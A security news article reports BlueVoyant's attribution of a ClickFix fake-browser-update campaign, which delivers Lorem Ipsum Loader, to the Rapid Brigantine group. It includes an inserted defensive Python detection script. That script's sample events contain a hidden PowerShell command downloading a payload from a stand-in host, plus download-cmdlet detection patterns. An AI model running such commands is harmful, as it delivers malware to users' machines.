Rapid Brigantine ties ClickFix malware to fake updates
Wed, 17th Jun 2026
BlueVoyant has linked an active ClickFix malware campaign that uses fake browser update prompts to the Rapid Brigantine cybercrime group, following analysis of a delivery chain that deploys the Lorem Ipsum Loader malware.
Researchers said the campaign represents a shift from an earlier operation that distributed trojanised Microsoft Teams installers through search engine optimisation poisoning and malicious advertising. The current activity relies on compromised WordPress websites that display fraudulent browser update messages designed to persuade users to run commands in Windows Terminal.
According to BlueVoyant, the change appears to follow Microsoft's disruption of the Forging Marauder malware-signing service in May 2026. Researchers believe the loss of access to fraudulently obtained code-signing certificates forced operators to abandon signed installer delivery methods and adopt ClickFix techniques instead.
Delivery shift
The attack begins when users visit compromised websites displaying a message claiming their browser requires a security update. Users are instructed to launch Windows Terminal and paste a PowerShell command presented by the site.
The command downloads a ZIP archive containing the malware payload and retrieves a portable copy of Node.js version 7.10.1 from the official Node.js distribution site. Once downloaded, the script extracts the files and launches a JavaScript component known as Update.js.
BlueVoyant said the JavaScript dropper reconstructs malware payloads using a custom text-based encoding method. Instead of storing executable code directly, the malware converts lists of seemingly harmless words into binary data at runtime. Researchers said the technique complicates static analysis and signature-based detection.
The malware then creates a directory in the ProgramData folder, reconstructs several files, and establishes persistence through Windows registry run keys. The process ensures malware execution whenever the user logs into Windows.
Tooling continuity
Although the delivery mechanism has changed, BlueVoyant said the underlying malware infrastructure shows significant continuity with earlier Lorem Ipsum campaigns. Researchers identified the same payload reconstruction routines, DLL sideloading techniques, command-and-control architecture and dead-drop resolver methods across both operations.
The campaign uses a renamed version of Microsoft's ClickOnce Launch Utility to sideload malicious DLL files. Researchers observed two DLL variants, mscoree.dll and msvcp140.dll, providing multiple execution paths for the malware.
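As an added defensive illustration (this is not BlueVoyant's code or detection content), the Python below scores constructed Sysmon-style process, registry and image-load events for the chain described above: a PowerShell host launched under Windows Terminal that pulls files down, a portable Node.js fetched from the official distribution site and then executing a script from a user-writable path, a Run key pointing into ProgramData, and mscoree.dll or msvcp140.dll loading from outside the Windows directory. The key=value event format, field names, file paths, registry value names and URLs are assumptions made for this example, and the sample lines are constructed rather than captured telemetry.

```python
"""Rule-based triage of constructed endpoint events for a ClickFix / portable Node.js chain.

Added example: the event format and every path, name and URL below are assumptions,
not artefacts from the campaign.  Real telemetry would come from Sysmon, EDR or
PowerShell script-block logging; the key=value lines stand in for that here.
"""
import re
from typing import Dict, List

# Constructed sample telemetry (simplified Sysmon-style key=value lines), not real captures.
SAMPLE_EVENTS = [
    # 1. The pasted command runs in a PowerShell hosted by Windows Terminal and downloads
    #    a payload ZIP plus a portable Node.js build from the official distribution site.
    r'type=ProcessCreate parent="C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0_x64\WindowsTerminal.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell -w hidden -c iwr https://update.example.invalid/pkg.zip -OutFile $env:TEMP\pkg.zip; '
    r'iwr https://nodejs.org/dist/v7.10.1/node-v7.10.1-win-x64.zip -OutFile $env:TEMP\node.zip"',
    # 2. The extracted portable node.exe launches a JavaScript dropper from a temp directory.
    r'type=ProcessCreate parent="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'image="C:\Users\alice\AppData\Local\Temp\node-v7.10.1-win-x64\node.exe" '
    r'cmdline="node.exe C:\Users\alice\AppData\Local\Temp\Update.js"',
    # 3. Persistence: a Run value whose data points into ProgramData (value name is constructed).
    r'type=RegistryValueSet image="C:\Users\alice\AppData\Local\Temp\node-v7.10.1-win-x64\node.exe" '
    r'key="HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate" '
    r'data="C:\ProgramData\SysUpdate\host.exe"',
    # 4. Sideload: a renamed launcher loads mscoree.dll from its own directory, not from Windows.
    r'type=ImageLoad image="C:\ProgramData\SysUpdate\host.exe" '
    r'loaded="C:\ProgramData\SysUpdate\mscoree.dll" signed=false',
    # 5. Benign: an interactive PowerShell started from Explorer listing a folder.
    r'type=ProcessCreate parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'cmdline="powershell -c Get-ChildItem C:\Users\alice\Documents"',
    # 6. Benign: a .NET application loading the real CLR shim from System32.
    r'type=ImageLoad image="C:\Program Files\Contoso\App.exe" '
    r'loaded="C:\Windows\System32\mscoree.dll" signed=true',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
TERMINALS = {"windowsterminal.exe", "wt.exe", "openconsole.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b", re.I)
NODE_DIST_RE = re.compile(r"nodejs\.org/dist/", re.I)
SIDELOAD_DLLS = {"mscoree.dll", "msvcp140.dll"}
USER_WRITABLE_MARKERS = ("c:\\programdata\\", "\\appdata\\", "\\temp\\", "c:\\users\\")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value line; quoted values may contain spaces."""
    return {key: quoted if quoted else bare for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_windows_dir(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def user_writable(path: str) -> bool:
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE_MARKERS)


def check_process(ev: Dict[str, str]) -> List[str]:
    """Terminal-hosted shell that downloads, Node.js staging, and portable node running a script."""
    hits = []
    image, parent, cmd = basename(ev.get("image", "")), basename(ev.get("parent", "")), ev.get("cmdline", "")
    if image in SHELLS and parent in TERMINALS and DOWNLOAD_RE.search(cmd):
        hits.append("clickfix_terminal_download")
    if DOWNLOAD_RE.search(cmd) and NODE_DIST_RE.search(cmd):
        hits.append("portable_node_staging")  # fetching node from nodejs.org is only odd in this context
    if image == "node.exe" and user_writable(ev.get("image", "")) and re.search(r"\.js\b", cmd, re.I):
        hits.append("portable_node_script")
    return hits


def check_registry(ev: Dict[str, str]) -> List[str]:
    """Run/RunOnce value whose target lives in a user-writable location."""
    key = ev.get("key", "").lower()
    if "\\currentversion\\run" in key and user_writable(ev.get("data", "")):
        return ["run_key_user_writable"]
    return []


def check_imageload(ev: Dict[str, str]) -> List[str]:
    """mscoree.dll normally loads from the Windows directory; msvcp140.dll often ships with
    applications, so for it an unsigned copy outside Windows is required before alerting."""
    loaded = ev.get("loaded", "")
    dll = basename(loaded)
    if dll in SIDELOAD_DLLS and not in_windows_dir(loaded):
        if dll == "mscoree.dll" or ev.get("signed", "").lower() == "false":
            return ["dll_sideload"]
    return []


CHECKS = {"ProcessCreate": check_process, "RegistryValueSet": check_registry, "ImageLoad": check_imageload}


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Run every applicable rule over each event and return the alerts in event order."""
    alerts: List[Dict[str, object]] = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        checker = CHECKS.get(ev.get("type", ""))
        for rule in (checker(ev) if checker else []):
            alerts.append({"rule": rule, "event": idx, "image": ev.get("image", "")})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"event {alert['event']}: {alert['rule']} ({alert['image']})")
```

The rules are deliberately narrow: a download cmdlet alone, or node.exe alone, is routine on many hosts, so each rule keys on the combination the article describes (terminal-hosted shell plus download, node.exe in a user-writable directory plus a script argument, a Run value aimed at ProgramData, a CLR shim DLL outside the Windows directory). In practice these would be correlated on the same host within a short window rather than alerted on individually.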
The Lorem Ipsum Loader subsequently retrieves additional malware components from command-and-control infrastructure whose locations are stored within attacker-controlled profiles on public websites. Researchers found operators had moved from LetsDiskuss to DigitalPoint while retaining the same encoding methods and delimiter conventions.
BlueVoyant also identified infrastructure designed to improve resilience. Each infected system communicates with multiple Cloudflare-protected command-and-control domains using a unique victim identifier. Researchers said the approach complicates disruption efforts and reduces the effectiveness of IP-based blocking.
Attribution evidence
BlueVoyant said multiple sources of intelligence support attribution to Rapid Brigantine, also known as Vanilla Tempest, DEV-0832, Vice Society and VICE SPIDER. The group has been active since at least 2022 and has been associated with ransomware families including Rhysida, BlackCat, Zeppelin and Quantum Locker.
Researchers pointed to Microsoft's previous disclosures involving fake Microsoft Teams installers, fraudulent signing certificates and Oyster malware delivery chains. They also cited findings from DFIR Report investigations that documented deployments of both Lorem Ipsum Loader and Rapid Brigantine-linked post-exploitation tools within the same intrusion.
BlueVoyant concluded that Lorem Ipsum is likely either a parallel loader or a successor loader within the Rapid Brigantine ecosystem rather than a separate malware operation. The company said the malware chain ultimately supports the group's established post-exploitation toolkit and ransomware deployment activities, particularly those involving Rhysida ransomware.
"Rather than functioning as an independent initial access broker, the Lorem Ipsum operation appears to be part of Rapid Brigantine's expanding initial access toolkit, operating alongside their Oyster malware pipeline and their Gootloader partnership with Lure Marauder," said Thomas Elkins and Joshua Green, researchers at BlueVoyant.